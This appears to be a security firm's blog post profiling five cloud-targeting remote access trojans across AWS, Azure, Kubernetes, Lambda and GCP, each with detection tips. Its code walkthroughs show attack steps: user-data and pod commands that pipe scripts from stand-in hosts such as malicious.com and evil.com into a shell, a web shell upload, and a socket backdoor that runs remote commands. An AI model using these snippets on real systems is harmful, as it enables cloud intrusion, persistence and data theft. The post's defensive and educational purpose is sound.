Cloud infrastructure has become the backbone of modern businesses, but with great scalability comes greater attack surfaces. In 2025, attackers are increasingly targeting cloud environments using sophisticated Remote Access Trojans (RATs). These cloud-focused RATs aren’t just ported versions of traditional malware—they’re designed from the ground up to exploit cloud APIs, container orchestration systems, identity and access management (IAM), and ephemeral infrastructure.
In this blog, I’ll walk you through the five most dangerous cloud RATs I’ve come across this year. But before we get into the list, let’s take a moment to clarify what makes these RATs different from their mobile or traditional counterparts.
-Book Your FREE Cybersecurity Consultation Today!
Table of Contents
What Are Cloud-Focused Remote Access Trojans?
Unlike mobile or desktop RATs that typically rely on local persistence mechanisms, cloud-focused RATs are optimized to:
Exploit misconfigured IAM roles or API keys.
Spread laterally across multi-cloud setups.
Deploy and orchestrate containers or Lambda functions.
Remain persistent across stateless environments.
Here’s a basic concept of how a cloud RAT might initiate lateral movement in AWS:
import boto3
def assume_role(session_name, role_arn):
sts_client = boto3.client('sts')
assumed_role = sts_client.assume_role(
RoleArn=role_arn,
RoleSessionName=session_name
)
return assumed_role['Credentials']
# Attacker's RAT assumes a role in another account
creds = assume_role("rat-session", "arn:aws:iam::123456789012:role/AdminRole")
Now, let’s dive into the top 5 RATs targeting the cloud in 2025.
1. NimbusStrike
Overview: NimbusStrike is tailor-made for AWS environments. It gains a foothold via leaked or phished API keys and pivots using the AWS CLI and Boto3.
Implementation Strategy:
Starts with basic key validation using
GetCallerIdentity.Enumerates services using
boto3.Deploys backdoored Lambda functions or EC2 user-data scripts.
Code Walkthrough:
# Backdoor an EC2 instance using user-data
import boto3
user_data_script = '''#!/bin/bash
curl -s http://malicious.com/payload.sh | bash
'''
ec2 = boto3.client('ec2')
ec2.run_instances(
ImageId='ami-xyz',
MinCount=1,
MaxCount=1,
UserData=user_data_script,
InstanceType='t2.micro'
)
Detection Tip: Look for unusual RunInstances events or modified user-data. AWS CloudTrail can help identify anomalies.
2. AzurePhantom
Overview: This RAT targets Microsoft Azure via the REST API. It abuses service principals and injects web shells into App Services.
Implementation Strategy:
Gains access using compromised client secrets.
Uses
az restand PowerShell to control cloud resources.Deploys Kudu-based web shells.
Code Walkthrough (Web Shell Deployment):
curl -X PUT -u ":$DEPLOYMENT_PASSWORD" \
-T shell.aspx \
https://<app-name>.scm.azurewebsites.net/wwwroot/shell.aspx
Detection Tip: Monitor Kudu SCM API access and look for non-developer IPs pushing content to /wwwroot.
3. CloudSpectre
Overview: CloudSpectre is a container-native RAT that integrates with Kubernetes clusters. It spreads via kubelets and misconfigured dashboards.
Implementation Strategy:
Deploys as a sidecar container.
Uses Kubernetes API to enumerate nodes and secrets.
Bypasses RBAC using stolen tokens.
Code Walkthrough (Pod Deployment):
apiVersion: v1
kind: Pod
metadata:
name: backdoor
spec:
containers:
- name: rat
image: attacker/reverse-shell:latest
command: ["/bin/sh", "-c", "curl http://evil.com/shell.sh | sh"]
Detection Tip: Audit your kube-apiserver logs and RBAC policy usage. Look for unapproved container images.
4. LambdaGhost
Overview: LambdaGhost specializes in ephemeral persistence by injecting itself into AWS Lambda layers. It rarely touches disk and evades most scanning tools.
Implementation Strategy:
Attaches malicious Lambda layers to existing functions.
Uses obfuscated Python/Node.js payloads.
Communicates over hidden CloudWatch logs.
Code Walkthrough (Python Layer Hijack):
# Sample RAT logic inside a Lambda layer
import socket
def backdoor():
s = socket.socket()
s.connect(('attacker.com', 4444))
while True:
cmd = s.recv(1024).decode()
exec(cmd)
Detection Tip: Track changes to Lambda layers. Monitor outbound connections from Lambda functions with VPC access.
5. GCPReaper
Overview: This RAT hits Google Cloud environments, especially Compute Engine and Cloud Functions. It abuses service accounts and IAM impersonation.
Implementation Strategy:
Impersonates service accounts using OAuth tokens.
Deploys Cloud Functions with malicious payloads.
Exfiltrates data via Google Sheets API.
Code Walkthrough (Function Deployment):
gcloud functions deploy exfil --runtime python39 \
--trigger-http --entry-point main \
--source=gs://evil-bucket/source.zip
Detection Tip: Enable logging for gcloud functions deploy and use Event Threat Detection to alert on abuse.
Conclusion
Cloud-focused RATs are a different beast altogether. They exploit the abstraction and automation of cloud services to hide, persist, and move laterally. Tools like NimbusStrike and AzurePhantom don’t need traditional persistence mechanisms they thrive in IAM misconfigurations and poorly monitored serverless functions.
If you’re in charge of cloud security, it’s not enough to secure your EC2 or S3. You need to:
Continuously rotate and audit your API keys.
Enforce least privilege policies on IAM.
Monitor all deployments via CI/CD pipelines.
Enable real-time alerting for cloud-native operations.
These threats are real, and they’re only growing more stealthy with each iteration. Hopefully, this guide gave you some practical insight into the landscape of cloud-based RATs in 2025.
Why Businesses Trust SecureMyOrg for Comprehensive Network Security
At SecureMyOrg, we uncover and fix all possible security vulnerabilities of mobile and web, while providing solutions to mitigate risks. We are trusted by renowned companies like Yahoo, Gojek and Rippling, and with 100% client satisfaction, you’re in safe hands!
Some of the things people reach out to us for –
- Building their cybersecurity program from scratch – setting up cloud security using cost-effective tools, SIEM for alert monitoring, building policies for the company
- Vulnerability Assessment and Penetration Testing ( VAPT ) – We have certified professionals, with certifications like OSCP, CREST – CPSA & CRT, CKA and CKS
- DevSecOps consulting
- Red Teaming activity
- Regular security audits, before product release
- Full time security engineers.
Relevant Posts
Critical Zero-Day in FortiVoice Patched by Fortinet After Active Exploits
Fortinet has patched a critical zero-day vulnerability (CVE-2025-32756) exploited in active attacks targeting FortiVoice and other products like FortiMail and FortiCamera. The flaw allowed remote code execution via crafted HTTP requests, with attackers deploying malware and harvesting credentials before the fix was released.
Top 5 Cloud-Focused Remote Access Trojans in 2025
Cloud environments are prime targets in 2025, with Remote Access Trojans engineered specifically to exploit them. This blog covers the top 5 cloud-focused RATs causing major security concerns.
Top 5 Fileless Remote Access Trojans in 2025
Fileless Remote Access Trojans are redefining stealth attacks in 2025 by leaving little to no trace on disk. This blog explores the top 5 fileless RATs attackers are using today.
Dissecting AsyncRAT’s Hold on Windows Systems in 2025
AsyncRAT continues to dominate Windows system compromises in 2025 with its stealth and modular design. This post dissects how it operates and why it remains a persistent threat.
Top 5 IoT Remote Access Trojans Crippling Devices in 2025
IoT devices are under siege in 2025 as Remote Access Trojans exploit their vulnerabilities at scale. This blog breaks down the top 5 IoT RATs causing widespread disruption.
Top 5 Web-Based Remote Access Trojans That Are Dominating 2025
Web-based Remote Access Trojans are becoming the go-to tool for cybercriminals in 2025. This post highlights five of the most widespread and dangerous ones currently in use.